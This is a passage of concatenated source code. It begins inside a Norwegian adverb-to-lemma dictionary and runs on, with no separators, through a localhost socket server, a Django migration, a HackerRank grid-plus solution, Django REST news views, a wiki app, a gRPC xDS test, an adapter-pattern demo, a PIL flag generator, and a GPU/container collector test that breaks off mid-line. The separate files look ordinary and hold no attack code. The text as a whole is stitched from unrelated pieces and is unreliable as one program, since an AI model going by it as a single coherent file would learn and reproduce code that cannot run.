'stykkevis': ('stykkevis',), 'styrbord': ('styrbord',), 'støtt': ('støtt',), 'støtvis': ('støtvis',), 'støytvis': ('støytvis',), 'sub rosa': ('sub rosa',), 'summa summarum': ('summa summarum',), 'surr': ('surr',), 'svinaktig': ('svinaktig',), 'svint': ('svint',), 'svintere': ('svint',), 'svintest': ('svint',), 'syd': ('syd',), 'sydost': ('sydost',), 'sydvest': ('sydvest',), 'sydøst': ('sydøst',), 'synderlig': ('synderlig',), 'så': ('så',), 'så pass': ('så pass',), 'sågar': ('sågar',), 'således': ('således',), 'såleis': ('såleis',), 'såpass': ('såpass',), 'såre': ('såre',), 'særdeles': ('særdeles',), 'særs': ('særs',), 'søkk': ('søkk',), 'søkkende': ('søkkende',), 'sønder': ('sønder',), 'sønna': ('sønna',), 'sønnafjells': ('sønnafjells',), 'sønnenfjells': ('sønnenfjells',), 'sør': ('sør',), 'søraust': ('søraust',), 'sørvest': ('sørvest',), 'sørøst': ('sørøst',), 'takimellom': ('takimellom',), 'takomtil': ('takomtil',), 'temmelig': ('temmelig',), 'ti': ('ti',), 'tidligdags': ('tidligdags',), 'tidsnok': ('tidsnok',), 'tidvis': ('tidvis',), 'til like': ('til like',), 'tilbake': ('tilbake',), 'tilfeldigvis': ('tilfeldigvis',), 'tilmed': ('tilmed',), 'tilnærmelsesvis': ('tilnærmelsesvis',), 'timevis': ('timevis',), 'titt': ('titt',), 'tiere': ('titt',), 'tiest': ('titt',), 'tjokkende': ('tjokkende',), 'tomreipes': ('tomreipes',), 'tott': ('tott',), 'trill': ('trill',), 'trillende': ('trillende',), 'trinnvis': ('trinnvis',), 'troppevis': ('troppevis',), 'troppo': ('troppo',), 'troppsvis': ('troppsvis',), 'trutt': ('trutt',), 'turevis': ('turevis',), 'turvis': ('turvis',), 'tusenvis': ('tusenvis',), 'tvers': ('tvers',), 'tvert': ('tvert',), 'tydeligvis': ('tydeligvis',), 'tålig': ('tålig',), 'tønnevis': ('tønnevis',), 'ufravendt': ('ufravendt',), 'ugjerne': ('ugjerne',), 'uheldigvis': ('uheldigvis',), 'ukevis': ('ukevis',), 'ultimo': ('ultimo',), 'ulykkeligvis': ('ulykkeligvis',), 'uløyves': ('uløyves',), 'undas': ('undas',), 'underhånden': ('underhånden',), 'undertiden': ('undertiden',), 'undervegs': ('undervegs',), 'underveis': ('underveis',), 'unntakelsesvis': ('unntakelsesvis',), 'unntaksvis': ('unntaksvis',), 'ustyggelig': ('ustyggelig',), 'ut': ('ut',), 'utaboks': ('utaboks',), 'utad': ('utad',), 'utalands': ('utalands',), 'utbygdes': ('utbygdes',), 'utdragsvis': ('utdragsvis',), 'ute': ('ute',), 'utelukkende': ('utelukkende',), 'utenat': ('utenat',), 'utenboks': ('utenboks',), 'utenlands': ('utenlands',), 'utomhus': ('utomhus',), 'uvegerlig': ('uvegerlig',), 'uviselig': ('uviselig',), 'uvislig': ('uvislig',), 'va banque': ('va banque',), 'vanligvis': ('vanligvis',), 'vann': ('vann',), 'ved like': ('ved like',), 'veggimellom': ('veggimellom',), 'vekk': ('vekk',), 'vekke': ('vekke',), 'vekselvis': ('vekselvis',), 'vel': ('vel',), 'vest': ('vest',), 'vesta': ('vesta',), 'vestafjells': ('vestafjells',), 'vestenfjells': ('vestenfjells',), 'vibrato': ('vibrato',), 'vice versa': ('vice versa',), 'vide': ('vide',), 'viden': ('viden',), 'vinterstid': ('vinterstid',), 'viselig': ('viselig',), 'visselig': ('visselig',), 'visst': ('visst',), 'visstnok': ('visstnok',), 'vivace': ('vivace',), 'vonlig': ('vonlig',), 'vonom': ('vonom',), 'vonoms': ('vonoms',), 'vrangsøles': ('vrangsøles',), 'ytterlig': ('ytterlig',), 'åkkesom': ('åkkesom',), 'årevis': ('årevis',), 'årlig års': ('årlig års',), 'åssen': ('åssen',), 'ørende': ('ørende',), 'øst': ('øst',), 'østa': ('østa',), 'østafjells': ('østafjells',), 'østenfjells': ('østenfjells',), 'øyensynlig': ('øyensynlig',), 'antageligvis': ('antageligvis',), 'overimorgen': ('overimorgen',), 'unntagelsesvis': ('unntagelsesvis',), 'sist': ('sist',), 'stetse': ('stetse',), 'stikk': ('stikk',), 'storlig': ('storlig',), 'still going strong': ('still going strong',), 'til og med': ('til og med',), 'i hu': ('i hu',), 'dengang': ('dengang',), 'derborte': ('derborte',), 'derefter': ('derefter',), 'derinne': ('derinne',), 'dernede': ('dernede',), 'deromkring': ('deromkring',), 'etterhvert': ('etterhvert',), 'fordømrade': ('fordømrade',), 'foreksempel': ('foreksempel',), 'forsåvidt': ('forsåvidt',), 'forøvrig': ('forøvrig',), 'herefter': ('herefter',), 'hvertfall': ('hvertfall',), 'idag': ('idag',), 'ifjor': ('ifjor',), 'i gang': ('i gang',), 'igår': ('igår',), 'ihvertfall': ('ihvertfall',), 'ikveld': ('ikveld',), 'iland': ('iland',), 'imorgen': ('imorgen',), 'imøte': ('imøte',), 'inatt': ('inatt',), 'iorden': ('iorden',), 'istand': ('istand',), 'istedet': ('istedet',), 'javisst': ('javisst',), 'neivisst': ('neivisst',), 'fortsatt': ('fortsatt',), 'slik': ('slik',), 'sådan': ('sådan',), 'sånn': ('sånn',), 'for eksempel': ('for eksempel',), 'fra barnsbein av': ('fra barnsbein av',), 'fra barnsben av': ('fra barnsben av',), 'fra oven': ('fra oven',), 'på vidvanke': ('på vidvanke',), 'rubb og stubb': ('rubb og stubb',), 'akterifra': ('akterifra',), 'andsynes': ('andsynes',), 'austenom': ('austenom',), 'avslutningsvis': ('avslutningsvis',), 'bøttevis': ('bøttevis',), 'bakenfra': ('bakenfra',), 'bakenom': ('bakenom',), 'baki': ('baki',), 'bedriftsvis': ('bedriftsvis',), 'beklageligvis': ('beklageligvis',), 'benveges': ('benveges',), 'benveies': ('benveies',), 'bistrende': ('bistrende',), 'bitvis': ('bitvis',), 'bortenom': ('bortenom',), 'bortmed': ('bortmed',), 'bråfort': ('bråfort',), 'bunkevis': ('bunkevis',), 'ca': ('ca',), 'derigjennom': ('derigjennom',), 'derover': ('derover',), 'dessuaktet': ('dessuaktet',), 'distriktsvis': ('distriktsvis',), 'doloroso': ('doloroso',), 'erfaringsvis': ('erfaringsvis',), 'falskelig': ('falskelig',), 'fjellstøtt': ('fjellstøtt',), 'flekkvis': ('flekkvis',), 'flerveis': ('flerveis',), 'forholdvis': ('forholdvis',), 'fornemmelig': ('fornemmelig',), 'fornuftigvis': ('fornuftigvis',), 'forsiktigvis': ('forsiktigvis',), 'forskottsvis': ('forskottsvis',), 'forskuddsvis': ('forskuddsvis',), 'forutsetningsvis': ('forutsetningsvis',), 'framt': ('framt',), 'fremt': ('fremt',), 'godhetsfullt': ('godhetsfullt',), 'hvortil': ('hvortil',), 'hvorunder': ('hvorunder',), 'hvorved': ('hvorved',), 'iltrende': ('iltrende',), 'innatil': ('innatil',), 'innentil': ('innentil',), 'innigjennom': ('innigjennom',), 'kilometervis': ('kilometervis',), 'klattvis': ('klattvis',), 'kolonnevis': ('kolonnevis',), 'kommunevis': ('kommunevis',), 'listelig': ('listelig',), 'lusende': ('lusende',), 'mildelig': ('mildelig',), 'milevidt': ('milevidt',), 'nordøstover': ('nordøstover',), 'ovenover': ('ovenover',), 'periodevis': ('periodevis',), 'pirende': ('pirende',), 'priori': ('priori',), 'rettnok': ('rettnok',), 'rykkvis': ('rykkvis',), 'sørøstover': ('sørøstover',), 'sørvestover': ('sørvestover',), 'sedvanligvis': ('sedvanligvis',), 'seksjonsvis': ('seksjonsvis',), 'styggfort': ('styggfort',), 'stykkomtil': ('stykkomtil',), 'sydvestover': ('sydvestover',), 'terminvis': ('terminvis',), 'tertialvis': ('tertialvis',), 'utdannelsesmessig': ('utdannelsesmessig',), 'vis-à-vis': ('vis-à-vis',), 'før': ('før',), 'jo': ('jo',), 'såvel': ('såvel',), 'efterhvert': ('efterhvert',), 'liksom': ('liksom',), 'dann og vann': ('dann og vann',), 'jaggu': ('jaggu',), 'joggu': ('joggu',), 'knekk': ('knekk',), 'live': ('live',), 'og': ('og',), 'sabla': ('sabla',), 'sikksakk': ('sikksakk',), 'stadig': ('stadig',), 'rett og slett': ('rett og slett',), 'såvidt': ('såvidt',), 'for moro skyld': ('for moro skyld',), 'omlag': ('omlag',), 'nattestid': ('nattestid',), 'sørpe': ('sørpe',), 'A.': ('A.',), 'selv': ('selv',), 'forlengst': ('forlengst',), 'sjøl': ('sjøl',), 'drita': ('drita',), 'ennu': ('ennu',), 'skauleies': ('skauleies',), 'iallefall': ('iallefall',), 'til alters': ('til alters',), 'pokka': ('pokka',), 'tilslutt': ('tilslutt',), 'i steden': ('i steden',), 'm.a.': ('m.a.',), 'til syvende og sist': ('til syvende og sist',), 'i en fei': ('i en fei',), 'ender og da': ('ender og da',), 'ender og gang': ('ender og gang',), 'fra arilds tid': ('fra arilds tid',), 'i hør og heim': ('i hør og heim',), 'for fote': ('for fote',), 'natterstid': ('natterstid',), 'natterstider': ('natterstider',), 'høgstdags': ('høgstdags',), 'høgstnattes': ('høgstnattes',), 'beint frem': ('beint frem',), 'beinveges': ('beinveges',), 'beinvegs': ('beinvegs',), 'beinveis': ('beinveis',), 'benvegs': ('benvegs',), 'benveis': ('benveis',), 'en garde': ('en garde',), 'etter hvert': ('etter hvert',), 'framåt': ('framåt',), 'krittende': ('krittende',), 'kvivitt': ('kvivitt',), 'maksis': ('maksis',), 'mangesteds': ('mangesteds',), 'møkka': ('møkka',), 'pill': ('pill',), 'sellende': ('sellende',), 'sirka': ('sirka',), 'subito': ('subito',), 'til sammen': ('til sammen',), 'tomrepes': ('tomrepes',), 'medurs': ('medurs',), 'moturs': ('moturs',), 'til ansvar': ('til ansvar',), 'til ansvars': ('til ansvars',), 'til fullnads': ('til fullnads',), 'concertando': ('concertando',), 'lesto': ('lesto',), 'tardando': ('tardando',), 'natters tid': ('natters tid',), 'natters tider': ('natters tider',), 'snydens': ('snydens',) }
import socket import logic import sys sock = socket.socket() server_address = ('localhost', 9080) print('starting up on{} port {}'.format(*server_address)) sock.bind(server_address) _logic = logic.Logic('vadik') sock.listen(1) while True: print('waiting for connection') connection, client_address = sock.accept() try: print('connection from', client_address) while True: data = connection.recv(1024) print('received {!r}'.format(data)) if data: print('sending data back to the client') encoding = 'utf-8' data = data.decode(encoding) print(data) data = _logic.query(data) connection.sendall(str.encode(str(data.is_exception))) connection.sendall(str.encode(data.str_for_print)) connection.sendall(str.encode(str(data.exception_func))) connection.sendall(str.encode(data.fields_for_func)) else: print('no data from', client_address) break finally: connection.close()
# -*- coding: utf-8 -*- # Generated by Django 1.9 on 2020-12-09 22:15 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('baza', '0011_auto_20201207_2227'), ] operations = [ migrations.RemoveField( model_name='zadanie', name='dopuszczenie', ), migrations.DeleteModel( name='Zadanie', ), ]
#!/bin/python3 import os # Complete the twoPluses function below. def twoPluses(grid): h, w = len(grid), len(grid[0]) mn = min(h, w) plus = [] is_good = lambda row, col: grid[row][col] == 'G' how = lambda x: 2 * x - 1 for step in range(1, mn // 2 + (1 if mn % 2 else 0)): for r in range(step, h - step): for c in range(step, w - step): if is_good(r, c): s1 = {(r1, c) for r1 in range(r - 1, r - step - 1, -1) if is_good(r1, c)} s2 = {(r1, c) for r1 in range(r + 1, r + step + 1, +1) if is_good(r1, c)} s3 = {(r, c1) for c1 in range(c - 1, c - step - 1, -1) if is_good(r, c1)} s4 = {(r, c1) for c1 in range(c + 1, c + step + 1, +1) if is_good(r, c1)} if len(s1) == len(s2) == len(s3) == len(s4) == step: plus.append((how(2 * step + 1), {(r, c)} | s1 | s2 | s3 | s4)) if not plus: return 1 if len(plus) == 1: return plus.pop()[0] from itertools import combinations combs = [s1 * s2 for (s1, a), (s2, b) in combinations(plus, 2) if a.isdisjoint(b)] return max(combs) if combs else plus.pop()[0] if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') nm = input().split() n = int(nm[0]) m = int(nm[1]) grid = [] for _ in range(n): grid_item = input() grid.append(grid_item) result = twoPluses(grid) fptr.write(str(result) + '\n') fptr.close()
from rest_framework import generics from .models import NewsItem from .serializers import NewsItemSerializer, NewsItemPreviewSerializer class NewsItemPreviewList(generics.ListAPIView): model = NewsItem serializer_class = NewsItemPreviewSerializer paginate_by = 5 filter_fields = ('language', ) def get_queryset(self, *args, **kwargs): qs = super(NewsItemPreviewList, self).get_queryset() qs = qs.published() qs = qs.order_by('-publication_date') return qs class NewsItemList(generics.ListAPIView): model = NewsItem serializer_class = NewsItemSerializer paginate_by = 5 filter_fields = ('language', ) def get_queryset(self, *args, **kwargs): qs = super(NewsItemList, self).get_queryset() qs = qs.published() qs = qs.order_by('-publication_date') return qs class NewsItemDetail(generics.RetrieveAPIView): model = NewsItem serializer_class = NewsItemSerializer def get_queryset(self, *args, **kwargs): qs = super(NewsItemDetail, self).get_queryset() qs = qs.published() return qs
from django.shortcuts import render, redirect from django.http import HttpResponse from .forms import SearchForm import random from . import util import markdown as md def index(request): return render(request, "encyclopedia/index.html", { "entries": util.list_entries() }) def search(request, entry): value = util.get_entry(entry) if value is None: matches = util.match_title(entry) if not matches: return render(request, "encyclopedia/404.html", { "entry": entry, }) return render(request, "encyclopedia/matches.html", { "entries": matches, "requestedpage": entry, }) html = md.markdown(value, extensions=['markdown.extensions.fenced_code']) return render(request, "encyclopedia/markdown.html", { "entry": entry, "body": html, }) def query(request): if request.method == "POST": return search(request, request.POST['q']) def createpage(request): if request.method == "GET": return render(request, "encyclopedia/createpage.html") elif request.method == "POST": title = request.POST['title'] if util.check_title(title): util.save_entry(title, request.POST['body']) return search(request, title) match = util.match_title(title).pop(0) return render(request, "encyclopedia/titleerror.html", { "title": match }) def editpage(request): if request.method == "GET": title = request.GET['q'] body = util.get_entry(title) return render(request, "encyclopedia/editpage.html", { "body": body, "title": title, }) elif request.method == "POST": print(request) title = request.POST['title'] util.save_entry(title, request.POST['body']) return redirect('/wiki/' + title) def randompage(request): entries = util.list_entries() random_entry = random.choice(entries) return redirect('/wiki/' + random_entry)
# Copyright 2020 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from absl import flags from absl.testing import absltest from framework import xds_k8s_testcase logger = logging.getLogger(__name__) flags.adopt_module_key_flags(xds_k8s_testcase) # Type aliases _XdsTestServer = xds_k8s_testcase.XdsTestServer _XdsTestClient = xds_k8s_testcase.XdsTestClient class BaselineTest(xds_k8s_testcase.RegularXdsKubernetesTestCase): def test_traffic_director_grpc_setup(self): with self.subTest('0_create_health_check'): self.td.create_health_check() with self.subTest('1_create_backend_service'): self.td.create_backend_service() with self.subTest('2_create_url_map'): self.td.create_url_map(self.server_xds_host, self.server_xds_port) with self.subTest('3_create_target_proxy'): self.td.create_target_proxy() with self.subTest('4_create_forwarding_rule'): self.td.create_forwarding_rule(self.server_xds_port) test_servers: _XdsTestServer with self.subTest('5_start_test_server'): test_servers = self.startTestServers() with self.subTest('6_add_server_backends_to_backend_service'): self.setupServerBackends() test_client: _XdsTestClient with self.subTest('7_start_test_client'): test_client = self.startTestClient(test_servers[0]) with self.subTest('8_test_client_xds_config_exists'): self.assertXdsConfigExists(test_client) with self.subTest('9_test_server_received_rpcs_from_test_client'): self.assertSuccessfulRpcs(test_client) if __name__ == '__main__': absltest.main(failfast=True)
class Adaptee: def hello(self): print('hi') class Adapter: def __init__(self): self._adaptee = Adaptee() def hello(self): self._adaptee.hello() # region usage if __name__ == '__main__': Adapter().hello() # endregion
from PIL import Image, ImageDraw import itertools import random class generateFlag: def __init__(self, count, seed): self.seed = seed self.flag = Image.new("RGB", (3840, 2160), "white") self.draw = ImageDraw.Draw(self.flag) self.last_position = 0 self.count = count self.color = open('colors.txt', 'r').read().split('\n') random.seed(self.seed) self.colors = [random.choice(self.color) for i in range(count)] print(f"Got colors for flag: {self.colors} using seed {self.seed}") def createStripes(self): for i in range(self.count+1): y_position = round(2160/self.count*i) color = self.colors[i-1] self.draw.rectangle([0, self.last_position, 3840, y_position], fill=color) self.last_position = y_position def run(self): self.createStripes() self.flag.save("flag.png")
# Copyright (c) Microsoft Corporation # All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and # to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING # BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import os import sys import unittest import datetime import time import logging import base sys.path.append(os.path.abspath("../src/")) import collector import nvidia import docker_inspect from collector import ContainerCollector from collector import GpuCollector logger = logging.getLogger(__name__) class TestContainerCollector(base.TestBase): """ Test ContainerCollector in collecotr.py """ def test_parse_from_labels(self): inspect_result = docker_inspect.InspectResult( "openmindstudio", "trialslot_nnimain_d65bc5ac", "tuner", "0", "this_is_pod_name_val", "0,1,", 12345, "[email protected]", "platform", False, False, ) gpu_ids, labels = ContainerCollector.parse_from_labels( inspect_result, None) self.assertEqual(["0", "1"], gpu_ids) target_labels = { "username": "openmindstudio", "job_name": "trialslot_nnimain_d65bc5ac", "role_name": "tuner", "task_index": "0", "pod_name": "this_is_pod_name_val", "user_email": "[email protected]", "vc_name": "platform", "preemptible": "false", } self.assertEqual(target_labels, labels) def test_infer_service_name(self): self.assertIsNone( ContainerCollector.infer_service_name( "k8s_POD_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8" )) self.assertEqual( "alertmanager", ContainerCollector.infer_service_name( "k8s_alertmanager_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8-a62d-000d3ab25bb6_2" )) self.assertIsNone( ContainerCollector.infer_service_name( "k8s_kube-scheduler_kube-scheduler-10.151.40.4_kube-system_f1164d931979939cf0601155df9c748a_6" )) class TestDockerCollector(base.TestBase): """ Test DockerCollector in collector.py """ def assert_metrics(self, metrics): self.assertEqual(1, len(metrics)) self.assertEqual(1, len(metrics[0].samples)) sample = metrics[0].samples[0] self.assertEqual(1, len(sample[1])) # label keys self.assertEqual(1, sample[2]) # sample value def test_impl(self): _, c = collector.instantiate_collector("test_docker_collector1", 0.5, datetime.timedelta(seconds=1), collector.DockerCollector) self.assert_metrics(c.collect_impl()) def test_base_collector(self): """ actually setup DockerCollector thread, and test, since this is multi-thread test case, maybe sensitive to the system load """ ref = collector.make_collector("test_docker_collector2", 0.5, datetime.timedelta(seconds=10), collector.DockerCollector) metrics = None for i in range(20): metrics = ref.get(datetime.datetime.now()) if metrics is not None: break time.sleep(0.1) self.assert_metrics(metrics) class TestZombieCollector(base.TestBase): """ Test ZombieCollector in collector.py """ def setUp(self): # Because prometheus forbid same metric name, and we generate metric # in from name, we need to differentiate name using time. t = str(time.time()).replace(".", "_") decay_time = datetime.timedelta(seconds=1) _, self.collector = collector.instantiate_collector( "test_zombie_collector" + t, 0.5, decay_time, collector.ZombieCollector, collector.AtomicRef(decay_time), collector.AtomicRef(decay_time)) def test_update_zombie_count_type1(self): start = datetime.datetime.now() one_sec = datetime.timedelta(seconds=1) type1_recorder = self.collector.type1_zombies self.assertEqual( set(), self.collector.update_zombie_count_type1({"a", "b"}, start)) self.assertEqual(2, len(type1_recorder)) self.assertEqual( set(), self.collector.update_zombie_count_type1( {"a", "b"}, start + type1_recorder.decay_time - one_sec)) self.assertEqual(2, len(type1_recorder)) self.assertEqual({"a", "b"}, self.collector.update_zombie_count_type1( {"a", "b"}, start + type1_recorder.decay_time + one_sec)) self.assertEqual(2, len(type1_recorder)) self.assertEqual({"a"}, self.collector.update_zombie_count_type1( {"a"}, start + type1_recorder.decay_time + 2 * one_sec)) self.assertEqual(1, len(type1_recorder)) self.assertEqual( set(), self.collector.update_zombie_count_type1( {}, start + type1_recorder.decay_time + 3 * one_sec)) self.assertEqual(0, len(type1_recorder)) def test_update_zombie_count_type2(self): start = datetime.datetime.now() one_sec = datetime.timedelta(seconds=1) stats = { "43ffe701d883": { "name": "core-caffe2_resnet50_20181012040921.586-container_e03_1539312078880_0780_01_000002", "id": "43ffe701d883" }, "8de2f53e64cb": { "name": "container_e03_1539312078880_0780_01_000002", "id": "8de2f53e64cb" } } type2_recorder = self.collector.type2_zombies self.assertEqual(set(), self.collector.update_zombie_count_type2(stats, start)) stats.pop("8de2f53e64cb") self.assertEqual( set(), self.collector.update_zombie_count_type2(stats, start + one_sec)) self.assertEqual( set(), self.collector.update_zombie_count_type2( stats, start + type2_recorder.decay_time)) self.assertEqual({"43ffe701d883"}, self.collector.update_zombie_count_type2( stats, start + type2_recorder.decay_time + 2 * one_sec)) stats.pop("43ffe701d883") self.assertEqual( set(), self.collector.update_zombie_count_type2( stats, start + type2_recorder.decay_time + 3 * one_sec)) class TestGpuCollector(base.TestBase): """ Test GpuCollector in collecotr.py """ def make_pid_to_cid_fn(self, mapping): def fn(pid): if pid in mapping: return True, mapping[pid] return False, "" return fn def test_convert_to_metrics(self): # sample may not ordered, and can not assertEqual directly, so tear them apart gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0", "GPU-uuid0", 37.0) ]) zombie_info = {"abc", "def"} pid_to_cid_mapping = {33: "def", 22: "ghi"} # only 33 is zombie metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_core_utils = collector.gen_gpu_util_gauge() target_core_utils.add_metric(["0", "GPU-uuid0"], 20) self.assertEqual(target_core_utils, core_utils) target_mem_utils = collector.gen_gpu_mem_util_gauge() target_mem_utils.add_metric(["0", "GPU-uuid0"], 21) self.assertEqual(target_mem_utils, mem_utils) target_ecc_errors = collector.gen_gpu_ecc_counter() target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_single"], 0) target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_double"], 0) target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_single"], 0) target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_double"], 0) self.assertEqual(target_ecc_errors, ecc_errors) target_mem_leak = collector.gen_gpu_memory_leak_counter() self.assertEqual(target_mem_leak, mem_leak) target_external_process = collector.gen_gpu_used_by_external_process_counter( ) target_external_process.add_metric(["0", "44"], 1) self.assertEqual(target_external_process, external_process) target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter( ) target_zombie_container.add_metric(["0", "def"], 1) self.assertEqual(target_zombie_container, zombie_container) target_gpu_temp = collector.gen_gpu_temperature_gauge() target_gpu_temp.add_metric(["0", "GPU-uuid0"], 37.0) self.assertEqual(target_gpu_temp, gpu_temp) # test minor 1 gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus( 30, 31, [55, 123], nvidia.EccError(volatile_single=2, volatile_double=3, aggregated_single=4, aggregated_double=5), "1", "GPU-uuid1", 24.0) ]) metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_core_utils = collector.gen_gpu_util_gauge() target_core_utils.add_metric(["1", "GPU-uuid1"], 30) self.assertEqual(target_core_utils, core_utils) target_mem_utils = collector.gen_gpu_mem_util_gauge() target_mem_utils.add_metric(["1", "GPU-uuid1"], 31) self.assertEqual(target_mem_utils, mem_utils) target_ecc_errors = collector.gen_gpu_ecc_counter() target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_single"], 2) target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_double"], 3) target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_single"], 4) target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_double"], 5) self.assertEqual(target_ecc_errors, ecc_errors) target_mem_leak = collector.gen_gpu_memory_leak_counter() self.assertEqual(target_mem_leak, mem_leak) target_external_process = collector.gen_gpu_used_by_external_process_counter( ) target_external_process.add_metric(["1", "55"], 1) target_external_process.add_metric(["1", "123"], 1) self.assertEqual(target_external_process, external_process) target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter( ) self.assertEqual(target_zombie_container, zombie_container) target_gpu_temp = collector.gen_gpu_temperature_gauge() target_gpu_temp.add_metric(["1", "GPU-uuid1"], 24.0) self.assertEqual(target_gpu_temp, gpu_temp) # test minor 2 gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024, [], nvidia.EccError(), "2", "GPU-uuid2", 30.0) ]) metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_core_utils = collector.gen_gpu_util_gauge() target_core_utils.add_metric(["2", "GPU-uuid2"], 40) self.assertEqual(target_core_utils, core_utils) target_mem_utils = collector.gen_gpu_mem_util_gauge() target_mem_utils.add_metric(["2", "GPU-uuid2"], 20 * 1024 * 1024) self.assertEqual(target_mem_utils, mem_utils) target_ecc_errors = collector.gen_gpu_ecc_counter() target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_single"], 0) target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_double"], 0) target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_single"], 0) target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_double"], 0) self.assertEqual(target_ecc_errors, ecc_errors) target_mem_leak = collector.gen_gpu_memory_leak_counter() self.assertEqual(target_mem_leak, mem_leak) target_external_process = collector.gen_gpu_used_by_external_process_counter( ) self.assertEqual(target_external_process, external_process) target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter( ) self.assertEqual(target_zombie_container, zombie_container) target_gpu_temp = collector.gen_gpu_temperature_gauge() target_gpu_temp.add_metric(["2", "GPU-uuid2"], 30.0) self.assertEqual(target_gpu_temp, gpu_temp) # test memory leak gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024 + 1, [], nvidia.EccError(), "3", "GPU-uuid3", 30.0) ]) metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_mem_leak = collector.gen_gpu_memory_leak_counter() target_mem_leak.add_metric(["3", "GPU-uuid3"], 1) self.assertEqual(target_mem_leak, mem_leak) def test_convert_to_metrics_with_no_zombie_info_BUGFIX(self): gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0", "GPU-uuid0", 40.0) ]) # zombie_info is empty should also have external process metric zombie_info = [] pid_to_cid_mapping = { 33: "def", 22: "ghi" } # only 44 is external process metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics self.assertEqual(0, len(zombie_container.samples)) self.assertEqual(1, len(external_process.samples)) self.assertEqual("0", external_process.samples[0].labels["minor_number"]) self.assertEqual("44", external_process.samples[0].labels["pid"]) # zombie_info is None should also have external process metric zombie_info = None metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics self.assertEqual(0, len(zombie_container.samples)) self.assertEqual(1, len(external_process.samples)) self.assertEqual("0", external_process.samples[0].labels["minor_number"]) self.assertEqual("44", external_process.samples[0].labels["pid"]) def test_convert_to_metrics_with_real_id_BUGFIX(self): gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(20, 21, [22], nvidia.EccError(), "0", "GPU-uuid0", 50.0) ]) # zombie_info is empty should also have external process metric zombie_info = {"ce5de12d6275"} pid_to_cid_mapping = { 22: "ce5de12d6275dc05c9ec5b7f58484f075f4775d8f54f6a4be3dc1439344df356" } metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics self.assertEqual(1, len(zombie_container.samples)) self.assertEqual("0", zombie_container.samples[0].labels["minor_number"]) self.assertEqual("ce5de12d6275", zombie_container.samples[0].labels["container_id"]) class TestAtomicRef(base.TestBase): """ Test AtomicRef in 